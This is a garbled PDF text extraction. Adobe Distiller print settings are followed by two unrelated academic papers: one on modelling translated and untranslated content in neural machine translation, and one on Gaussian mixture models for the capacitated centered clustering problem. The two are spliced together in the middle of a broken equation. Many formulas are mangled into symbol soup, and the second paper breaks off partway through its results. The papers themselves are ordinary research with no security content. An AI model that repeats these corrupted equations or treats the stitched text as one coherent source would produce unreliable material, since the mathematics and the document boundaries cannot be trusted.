/JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_3ecslqollvat3jyruwpjy26lou ---- Modeling Past and Future for Neural Machine Translation Zaixiang Zheng∗ Nanjing University zhengzx@nlp.nju.edu.cn Hao Zhou∗ Toutiao AI Lab zhouhao.nlp@bytedance.com Shujian Huang Nanjing University huangsj@nlp.nju.edu.cn Lili Mou University of Waterloo doublepower.mou@gmail.com Xinyu Dai Nanjing University dxy@nlp.nju.edu.cn Jiajun Chen Nanjing University chenjj@nlp.nju.edu.cn Zhaopeng Tu Tencent AI Lab zptu@tencent.com Abstract Existing neural machine translation systems do not explicitly model what has been trans- lated and what has not during the decoding phase. To address this problem, we propose a novel mechanism that separates the source information into two parts: translated PAST contents and untranslated FUTURE contents, which are modeled by two additional recur- rent layers. The PAST and FUTURE contents are fed to both the attention model and the de- coder states, which provides Neural Machine Translation (NMT) systems with the knowl- edge of translated and untranslated contents. Experimental results show that the proposed approach significantly improves the perfor- mance in Chinese-English, German-English, and English-German translation tasks. Specif- ically, the proposed model outperforms the conventional coverage model in terms of both the translation quality and the alignment error rate.† 1 Introduction Neural machine translation (NMT) generally adopts an encoder-decoder framework (Kalchbrenner and Blunsom, 2013; Cho et al., 2014; Sutskever et al., 2014), where the encoder summarizes the source sentence into a source context vector, and the de- coder generates the target sentence word-by-word based on the given source. During translation, the decoder implicitly serves several functionalities at the same time: *Equal contributions. †Our code can be downloaded from https://github. com/zhengzx-nlp/past-and-future-nmt. 1. Building a language model over the target sen- tence for translation fluency (LM). 2. Acquiring the most relevant source-side in- formation to generate the current target word (PRESENT). 3. Maintaining what parts in the source have been translated (PAST) and what parts have not (FUTURE). However, it may be difficult for a single recur- rent neural network (RNN) decoder to accomplish these functionalities simultaneously. A recent suc- cessful extension of NMT models is the attention mechanism (Bahdanau et al., 2015; Luong et al., 2015), which makes a soft selection over source words and yields an attentive vector to represent the most relevant source parts for the current decoding state. In this sense, the attention mechanism sepa- rates the PRESENT functionality from the decoder RNN, achieving significant performance improve- ment. In addition to PRESENT, we address the impor- tance of modeling PAST and FUTURE contents in machine translation. The PAST contents indicate translated information, whereas the FUTURE con- tents indicate untranslated information, both being crucial to NMT models, especially to avoid under- translation and over-translation (Tu et al., 2016). Ideally, PAST grows and FUTURE declines during the translation process. However, it may be difficult for a single RNN to explicitly model the above pro- cesses. In this paper, we propose a novel neural machine translation system that explicitly models PAST and FUTURE contents with two additional RNN layers. The RNN modeling the PAST contents (called PAST layer) starts from scratch and accumulates the in- 145 Transactions of the Association for Computational Linguistics, vol. 6, pp. 145–157, 2018. Action Editor: Philipp Koehn. Submission batch: 6/2017; Revision batch: 9/2017; Published 3/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. formation that is being translated at each decoding step (i.e., the PRESENT information yielded by at- tention). The RNN modeling the FUTURE contents (called FUTURE layer) begins with holistic source summarization, and subtracts the PRESENT infor- mation at each step. The two processes are guided by proposed auxiliary objectives. Intuitively, the RNN state of the PAST layer corresponds to source contents that have been translated at a particular step, and the RNN state of the FUTURE layer cor- responds to source contents of untranslated words. At each decoding step, PAST and FUTURE together provide a full summarization of the source informa- tion. We then feed the PAST and FUTURE informa- tion to both the attention model and decoder states. In this way, our proposed mechanism not only pro- vides coverage information for the attention model, but also gives a holistic view of the source informa- tion at each time. We conducted experiments on Chinese-English, German-English, and English-German benchmarks. Experiments show that the proposed mechanism yields 2.7, 1.7, and 1.1 improvements of BLEU scores in three tasks, respectively. In addition, it ob- tains an alignment error rate of 35.90%, significantly lower than the baseline (39.73%) and the coverage model (38.73%) by Tu et al. (2016). We observe that in traditional attention-based NMT, most errors occur due to over- and under-translation, which is probably because the decoder RNN fails to keep track of what has been translated and what has not. Our model can alleviate such problems by explicitly modeling PAST and FUTURE contents. 2 Motivation In this section, we first introduce the standard attention-based NMT, and then motivate our model by several empirical findings. The attention mechanism, proposed in Bahdanau et al. (2015), yields a dynamic source context vec- tor for the translation at a particular decoding step, modeling PRESENT information as described in Sec- tion 1. This process is illustrated in Figure 1. Formally, let x = {x1, . . . ,xI} be a given in- put sentence. The encoder RNN—generally imple- mented as a bi-directional RNN (Schuster and Pali- wal, 1997)—transforms the sentence to a sequence ct hi hi hI hI h1 h1 xix1 Encoder + αt,1 αt, i αt, I ss yt Decoder In iti al iz e w ith so ur ce s um m ar iz at io n source vector for present translation xI Figure 1: Architecture of attention-based NMT. of annotations with hi = [−→ h i; ←− h i ] being the an- notation of xi. ( −→ h i and ←− h i refer to RNN’s hidden states in both directions.) Based on the source annotations, another decoder RNN generates the translation by predicting a target word yt at each time step t: P(yt|yWv + b. In other words, we explicitly guide the FUTURE layer by this subtractive loss, expecting ∆Ft to be discriminative of the current word yt. Loss Function for Addition. Likewise, we intro- duce another loss function to measure the informa- tion incrementation of the PAST layer. Notice that ∆Pt = s P t − sPt−1 ≈ ct, is defined similarly to ∆Ft except a minus sign. In this way, we can reasonably assume the FUTURE and PAST layers are indeed do- ing subtraction and addition, respectively. 150 Training Objective. We train the proposed model θ̂ on a set of training examples {[xn, yn]}Nn=1, and the training objective is θ̂ = arg min θ N∑ n=1 |y|∑ t=1 { − log P(yt|y> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_3fky2fv4l5b7horsv5frlbujja ---- Solution strategy based on Gaussian mixture models and dispersion reduction for the capacitated centered clustering problem Solution strategy based on Gaussian mixture models and dispersion reduction for the capacitated centered clustering problem Santiago-Omar Caballero-Morales Postgraduate Department of Logistics and Supply Chain Management, Universidad Popular Autonóma del Estado de Puebla, Puebla, Puebla, Mexico ABSTRACT The Capacitated Centered Clustering Problem (CCCP)—a multi-facility location model—is very important within the logistics and supply chain management fields due to its impact on industrial transportation and distribution. However, solving the CCCP is a challenging task due to its computational complexity. In this work, a strategy based on Gaussian mixture models (GMMs) and dispersion reduction is presented to obtain the most likely locations of facilities for sets of client points considering their distribution patterns. Experiments performed on large CCCP instances, and considering updated best-known solutions, led to estimate the performance of the GMMs approach, termed as Dispersion Reduction GMMs, with a mean error gap smaller than 2.6%. This result is more competitive when compared to Variable Neighborhood Search, Simulated Annealing, Genetic Algorithm and CKMeans and faster to achieve when compared to the best-known solutions obtained by Tabu-Search and Clustering Search. Subjects Algorithms and Analysis of Algorithms, Data Mining and Machine Learning, Optimization Theory and Computation Keywords Capacitated centered clustering problem, Gaussian mixture models, Dispersion reduction, Expectation-maximization INTRODUCTION Facilities are very important infrastructure within the supply chain as they support production, distribution and warehousing. Due to this, many operative processes associated to facilities are subject to optimization. Fields such as facility layout planning are crucial for smooth material handling and production flow (Mohamadghasemi & Hadi-Vencheh, 2012, Hadi-Vencheh & Mohamadghasemi, 2013; Niroomand et al., 2015). On the other hand, where to locate facilities within specific regions is a central problem for strategic decisions of transportation and distribution (Chaves, Correa & Lorena, 2007). This is because the distance between the facilities and the customers (demand or client points) is crucial to provide efficient transportation and distribution services. Within this context, the Capacitated Centered Clustering Problem (CCCP) is one of the best-known and most challenging multi-facility location (MFL) problems in the fields of operations research, logistics and supply chain management (Chaves & Nogueira-Lorena, 2010, Mahmoodi-Darani et al., 2013). The CCCP is focused on determining clusters or How to cite this article Caballero-Morales S-O. 2021. Solution strategy based on Gaussian mixture models and dispersion reduction for the capacitated centered clustering problem. PeerJ Comput. Sci. 7:e332 DOI 10.7717/peerj-cs.332 Submitted 11 June 2020 Accepted 18 November 2020 Published 3 February 2021 Corresponding author Santiago-Omar Caballero-Morales, santiagoomar.caballero@upaep.mx Academic editor Angelo Ciaramella Additional Information and Declarations can be found on page 17 DOI 10.7717/peerj-cs.332 Copyright 2021 Caballero-Morales Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.332 mailto:santiagoomar.�caballero@�upaep.�mx https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.332 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ groups of demand or client points which can lead to minimum average distances to their centroids (where facilities are to be located). The cumulative demand of the client points assigned to a cluster cannot exceed the capacity of the facility located at its centroid (Chaves & Nogueira-Lorena, 2010; Chaves & Nogueira-Lorena, 2011; Negreiros & Palhano, 2006). The mathematical formulation of the CCCP is presented as follows (Chaves & Nogueira-Lorena, 2011; Negreiros & Palhano, 2006): min X i2I X k2K xi �mkk k2yik (1) subject to X k2K yik ¼ 1 8i 2 I (2) X i2I yik ¼ nk 8k 2 K (3) X i2I xiyik � nkmk 8k 2 K (4) X i2I diyik � Ck 8k 2 K: (5) mk 2 1,000 points). This is accomplished by the meta-heuristic termed as Dispersion Reduction GMMs (DRG) which integrates the following algorithms: � an adapted Expectation-Maximization (EM) algorithm to estimate the parameters of GMMs and generate clusters of points of maximum likelihood with the capacity requirements of the CCCP; � a dispersion reduction algorithm to compress large CCCP data and achieve near optimal results within faster computational times. Both, the application of the GMMs and the validity of the EM algorithm for the CCCP, have not been explored in previous works. Experiments of the DRG on large instances of the CCCP considering the benchmarks of the Clustering Search (CS) algorithm (De-Oliveira, Chaves & Nogueira-Lorena, 2013) and Tabu-Search (TS) (Fernandes- Muritiba et al., 2012) led to a mean error less than 2.6%. In general, the DRG algorithm performed better than Variable Neighborhood Search (VNS), Simulated Annealing (SA), Genetic Algorithms (GA) and CKMeans (CKM). The advances of the present work can provide a better understanding of Gaussian modeling and the EM algorithm for their application in facility location problems. The contributions of this paper are presented as follows: First, in Section “Clustering” an overview of clustering and the mathematical foundations of GMMs are presented. Also, the findings regarding the specific dispersion reduction process required by CCCP data in order to make it suitable for the EM algorithm are presented and discussed. Then, in Section “DRG Meta-heuristic” the details of the DRG meta-heuristic are presented while the results regarding its performance are discussed in Section “Results and Assessment”. Finally, conclusions and improvement recommendations are discussed in Section “Conclusions and Future Work”. CLUSTERING Most of the solving algorithms for the CCCP perform clustering within the search process for initial partitioning of the set of demand points. This partitioning is then improved by exchanging certain points between the most promising partitions or clusters (Hansen & Jaumard, 1997; Negreiros & Palhano, 2006). Formally, clustering involves the grouping of data points in a way that homogeneity of points within a group, and the heterogeneity of points between groups, are maximized (Chaves & Nogueira-Lorena, 2010; Negreiros & Palhano, 2006). For the CCCP the technique used for clustering has an important role in the quality of the solutions, which Caballero-Morales (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.332 3/19 http://dx.doi.org/10.7717/peerj-cs.332 https://peerj.com/computer-science/ may lead to significant differences from best-known results (i.e., errors from to 15.0% (Radiah, Hasnah & Omar, 2013) to 50% (Negreiros & Palhano, 2006)). Gaussian mixture models Gaussian Mixture Models (GMMs) have been widely studied for data modeling within the field of pattern classification based on Bayes decision theory (Theodoridis & Koutroumbas, 2010). For more accurate modeling of multi-dimensional patterns a mixture of Gaussian distributions can be used. Each mixture component is defined by two main parameters: a mean vector and a covariance matrix (Forsyth, 2012; Theodoridis & Koutroumbas, 1979; Theodoridis & Koutroumbas, 2010). Within this context, “clusters” can be characterized by each Gaussian component (mixture) which can model sub-sets of the whole set of patterns with maximum likelihood. There are important differences between clustering that can be obtained with GMMs and centroid-based clustering techniques (such as K-Means or K-Nearest Neighbors). The following can be mentioned: � Over-fitting (e.g., the model “overreacts” to minor fluctuations in the training data for prediction purposes) can be avoided with Gaussian distribution-based clustering. � Clusters defined with Gaussian distributions can have different shapes and sizes. By contrast, centroid-based clustering algorithms tend to find clusters of comparable size of (more or less) symmetrical shape (Mohammed, Badruddin & Mohammed, 2016). � At each iteration, Gaussian distribution-based clustering performs, for a given point, a “soft-assignment” to a particular cluster (there is a degree of uncertainty regarding the assignment). The centroid-based clustering performs a hard-assignment (or direct assignment) where a given point is assigned to a particular cluster and there is no uncertainty. Due to these differences, the GMM-based clustering was considered as an alternative to generate feasible solutions for the CCCP. In terms of the CCCP formulation described in Section “Introduction” a cluster can be modeled by a single Gaussian probability density function (PDF). Hence, the location “patterns” of a set of clients X can be modeled by a mixture of K Gaussian PDFs where each PDF models a single cluster. If the set contains N clients, then X ¼ xi¼1; xi¼2; …; xi¼N½ � and the mixture can be expressed as: pðXÞ¼ XK k¼1 PkpðXjkÞ¼ XK k¼1 PkNðXjmk; SkÞ; (7) where k = 1,…, K and |K| = p is the number of Gaussian PDFs, p(X | k) represents the probabilities of each Gaussian PDF describing the set of clients X (Theodoridis & Koutroumbas, 2010) and Pk is the weight associated to each Gaussian PDF (hence,PK k¼1 Pk = 1.0). Each Gaussian component can be expressed as: pðXjkÞ¼NðXjmk; SkÞ¼ 1ffiffiffiffiffiffiffiffiffiffiffiffi 2pjSkj p e� 1 2 ðX �mkÞTS�1k ðX �mkÞ 8k 2 K; (8) Caballero-Morales (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.332 4/19 http://dx.doi.org/10.7717/peerj-cs.332 https://peerj.com/computer-science/ where mk is the mean vector and Sk is the covariance matrix of the k-th Gaussian PDF or k- th cluster. Note that mk and each element of X (i.e., any xi) must have the same size or dimension which is defined by l (in this case, l = 2 because each point consists of a x-coordinate and a y-coordinate). Finally, Sk is a matrix of size l × l. For clustering purposes, mk can model the mean vector of a sub-set of points in X which is more likely to be described by the Gaussian PDF k as estimated by Eq. (8). If the points in this sub-set of X are clustered, then mk can represent the “centroid” of the cluster k and Sk can model the size and shape of the cluster k (Bishop, 2006; Theodoridis & Koutroumbas, 2010). Observe that X − mk defines a distance or difference between each point in X and the centroid (located at mk) of each cluster k. Thus, the estimation of probabilities considers the distance between each point xi and each cluster k. The parameters of the Gaussian PDFs (Pk, mk and Sk) that best model (describe) each sub-set of the whole pattern X can be estimated by the iterative algorithm of Expectation-Maximization (EM) (Bishop, 2006; Theodoridis & Koutroumbas, 2010). The advantage of this Gaussian approach for clustering is that faster inference about the points xi that belong to a specific cluster k may be obtained considering all points. In this context, it is important to mention that due to the probabilistic nature of the inference process, a single point xi is not directly assigned to a specific cluster (as it is required by the CCCP) because all points have probabilities associated to all clusters (i.e., “soft- assignment”). Also, this approach does not consider the capacity of each cluster and the demand associated to each client point. Thus, restrictions about the quantity of points xi associated to each cluster are not integrated in this algorithm. In order to consider these requirements and restrictions a modification on the EM algorithm was performed. This is described in the following sections. Dispersion reduction in GMMs performance for the CCCP Capacitated Centered Clustering Problem data, which consists of x and y coordinates, represents a particular challenge for GMMs. This is because the values of coordinates can affect the computation of the exponential element of Eq. (8). Also, dispersion of data may affect convergence of the EM algorithm for Pk, mk and Sk. Thus, specific re-scaling or coding of CCCP data was required to reduce the effect of dispersion and coordinates’ values on the computations of GMMs. In order to reduce dispersion of the CCCP data the compression algorithm presented in Fig. 1 was performed. It is important to mention that compression is only performed on the coordinates’ values, and not on the number of data points (thus, the size of the instance remains the same). As presented, the original x–y coordinates were replaced by their unique indexes. This led to elimination of empty spaces between data points. Coding of the compressed data was performed within the interval 0; 1½ � as presented in Fig. 1. This coding made the compressed data more suitable for fast computation of Eq. (8). Caballero-Morales (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.332 5/19 http://dx.doi.org/10.7717/peerj-cs.332 https://peerj.com/computer-science/ An important issue regarding the use of GMMs for the CCCP is the restriction on the number of Gaussian components. In this regard, extensive research has been performed to determine the most suitable number of Gaussian components for different sets of data (McLachlan & Rathnayake, 2014). However, available research does not consider the capacity aspect of clustering which is the main feature of CCCP data. Nevertheless, a restriction on the number of Gaussian components must be considered because, as discussed in Fraley & Raftery (1998), the EM algorithm may not be suitable for cases with very large numbers of components. Due to this situation a maximum number of 30 Gaussian components was considered. This restriction was based on the DONI database, which has some of the CCCP instances with the largest number of client points (Fernandes-Muritiba et al., 2012) (i.e., N = 13,000 client points with p = 30 facilities). A discussion on future extensions for the Gaussian approach and the EM algorithm to address larger number of components is presented in the final section. DRG META-HEURISTIC Standard EM algorithm Figure 2 presents the structure of the standard EM algorithm (Bishop, 2006; Theodoridis & Koutroumbas, 1979; Theodoridis & Koutroumbas, 2010) considering the variables defined by Eqs. (7) and (8). In this case, X represents the array of compressed and coded x − y coordinates of all points xi (the array structures presented in Figs. 2 and 3 follow the EM formulation described in Theodoridis & Koutroumbas (1979)). 0 50 100 150 200 250 80 70 60 50 40 original coordinates 250 40 150 50 50 80 50 60 unique x-coordinates = [50, 150, 250] index i = 1, 2, 3 unique y-coordinates = [40, 50, 60, 80] index j = 1, 2, 3, 4 compressed coordinates 3 1 2 2 1 4 1 3 i j 0 1 2 3 4 5 5 4 3 2 1 coded coordinates 1.00 0.25 0.67 0.50 0.33 1.00 0.33 0.75 i/maxi j/maxj 0 0.33 0.67 1.00 1.00 0.75 0.50 0.25 maxi = 3 maxj=4 Figure 1 CCCP data compression and coding algorithm (dispersion reduction algorithm). Full-size DOI: 10.7717/peerj-cs.332/fig-1 Caballero-Morales (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.332 6/19 http://dx.doi.org/10.7717/peerj-cs.332/fig-1 http://dx.doi.org/10.7717/peerj-cs.332 https://peerj.com/computer-science/ As presented in Fig. 2, the locations of the N clients are stored into the array X which consists of a matrix of dimension l × N where: (a) N is the number of client points, and (b) l = 2 as each column vector of X consists of the values cxi and cyi that identify the compressed and coded x − y coordinates of the client point xi where i = 1,…, N. The EM algorithm starts with initial values for mk, Sk and Pk. Values for mk and Sk were randomly generated as follows: mk ¼ h randomðcxmin; cxmaxÞ; randomðcymin; cymaxÞ iT 8k 2 K; (9) Sk ¼ randomð0:0; 0:1Þ� Il 8k 2 K; (10) where (cxmin, cxmax) and (cymin, cymax) are the minimum and maximum values throughout all compressed and coded x and y coordinates respectively, and Il is the identity matrix of size l × l. Figure 2 Structure of the standard expectation-maximization (EM) algorithm. Full-size DOI: 10.7717/peerj-cs.332/fig-2 Caballero-Morales (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.332 7/19 http://dx.doi.org/10.7717/peerj-cs.332/fig-2 http://dx.doi.org/10.7717/peerj-cs.332 https://peerj.com/computer-science/ For Pk a lower bound for K was obtained by considering the total demand of the points xi and the capacity of the clusters Ck. Because all clusters have the same capacity, Ck = C. Then, K and Pk were obtained as follows: K ¼ PN i¼1 di C ; (11) Pk ¼ 1 jKj 8k 2 K: (12) The stage of Expectation starts with these initial values for mk, Sk and Pk. An initial computation of assignment or “responsibility” scores γ (zik) is performed to determine which xi is more likely to be associated to a particular cluster (and thus, to belong to this cluster) with parameters mk, Sk and Pk (Bishop, 2006). Observe that, as presented in Fig. 2 (Step 2), γ (zik) is computed by means of Eq. (8). These scores can lead to provide values for the decision variable yik of the CCCP objective function (see Eq. (1)). This process will be discussed in the following section. Then, the stage of Maximization integrates the scores γ (zik) into the re-estimation of the cluster’s parameters which leads to mnewk , S new k and P new k . Convergence is achieved if the total error or absolute difference between the previous and new estimates is less than a given threshold e (in this case, e=0.5). If convergence is not achieved, then mk mnewk , Sk Snewk and Pk Pnewk . Modified EM algorithm with direct assignment and capacity restrictions As discussed in Section “Gaussian Mixture Models” the advantage of the GMMs approach is that faster inference about the points xi that belong to a specific cluster k can be obtained. This inference is performed based on the probabilities defined by Eq. (8) where the Figure 3 Assignment of values for yik from the scores of γ(zik). Full-size DOI: 10.7717/peerj-cs.332/fig-3 Caballero-Morales (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.332 8/19 http://dx.doi.org/10.7717/peerj-cs.332/fig-3 http://dx.doi.org/10.7717/peerj-cs.332 https://peerj.com/computer-science/ parameters of the Gaussian PDFs are estimated with the standard EM algorithm. However under this approach a single point xi is not directly assigned to a specific cluster (as it is required by the CCCP) because all points have probabilities associated to all clusters (i.e., “soft-assignment”). Also, while the standard EM algorithm can determine the most likely sub-sets of client points in X to be covered by each cluster k, these sub-sets are not restricted by the capacity of the cluster and the demand of each assigned client point. Hence, the standard EM algorithm was modified in order to comply with the requirements and restrictions of the CCCP. As previously mentioned, the score γ (zik) computed in Step 2 of the EM algorithm (see Fig. 2) represents the likelihood or responsibility of the cluster k on the generation of the point xi (Bishop, 2006). As presented in Fig. 3 all scores are stored into a matrix γ of dimension K × N, where each column vector cðzi1Þ; …; cðziKÞ½ �T contains the assignment scores of the point xi to all clusters (thus, PK k¼1 cðzikÞ¼ 1:0 8i 2 N). These scores represent the basis for defining the decision variable yik. From Section “Introduction” it was explained that yik = 1 if the point xi is assigned to cluster k and yik = 0 otherwise (each point xi can be assigned to only one cluster). Based on the scores of γ (zik) it was determined that for each vector xi the cluster assignment would be defined by the cluster k with maximum γ(zik) value. If two or more clusters share the same maximum likelihood, then one of them is randomly assigned. An example of this assignment process is presented in Fig. 3. By determining the unique assignment of each point xi to each cluster k at Step 2 of the EM algorithm (see Fig. 2), the number of points assigned to each cluster is obtained. This leads to determine the cumulative demand of the points assigned to each cluster. This information is stored into the vector: Demands ¼ D1; D2; …; DK½ �; (13) where Dk represents the cumulative demand of the points assigned to cluster k and it must satisfy Dk ≤ Ck. This vector is important to comply with the capacity restrictions because it was found that homogenization of the cumulative demands Dk contributes to this objective. Homogenization is achieved by minimizing the coefficient of variation between all cumulative demands: min CV ¼ Standard DeviationðDemandsÞ MeanðDemandsÞ : (14) The objective function defined by Eq. (14) is integrated within the evaluation step of the standard EM algorithm (see Step 4 of Fig. 2). This leads to the modified EM algorithm with capacity restrictions where convergence is based on two objectives: � minimization of the error (less than a threshold of e = 0.5) between the estimates of mk, Pk and Sk; � minimization of the coefficient of variation of Demands. An important issue regarding the minimization of CV is that there is the possibility that min CV may not lead to comply the condition Dk ≤ Ck for all clusters k. This was addressed Caballero-Morales (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.332 9/19 http://dx.doi.org/10.7717/peerj-cs.332 https://peerj.com/computer-science/ by the following strategy: if min CV leads to a cluster k where the condition Dk ≤ Ck is not complied, then the farthest assigned points are re-assigned to other clusters with closer centroids and available capacity. Figure 4 presents an example of the clustering achieved without and with the objective function defined by Eq. (14). As presented, the clusters are more accurately defined with the integration of Eq. (14). Also, clusters comply with the capacity restrictions of the CCCP. It is important to remember that the proposed DRG meta-heuristic consists of the modified EM algorithm which provides the cluster assignation for each point xi considering compressed and coded CCCP data. Thus, Fig. 4 presents the decoded and uncompressed points xi (i.e., original cxi and cyi coordinates) assigned to each cluster based on the assignments of the DRG meta-heuristic with the modified EM algorithm on compressed and coded data. Further improvement of the assignments and the centroids at mk are achieved by a Greedy algorithm that verifies that all points xi are assigned to the closest cluster. This leads to additional exchange and insertion/deletion of complying client points xi between clusters. These operations must comply with the capacity restrictions of each cluster. The assignments are updated if the insertion/deletion is valid. This leads to re-estimation of the locations of the mk centroids. RESULTS AND ASSESSMENT Implementation of the DRGMMs meta-heuristic was performed with the software MATLAB on a laptop computer with the following hardware: Intel CORE i7-4500U CPU at 2.40 GHz with 8 GB RAM. For testing purposes the libraries presented in Table 1 were considered. For comparison purposes the methods and best-known results presented in Chaves & Nogueira-Lorena (2010), Chaves & Nogueira-Lorena (2011), Fernandes-Muritiba et al. (2012), De-Oliveira, Chaves & 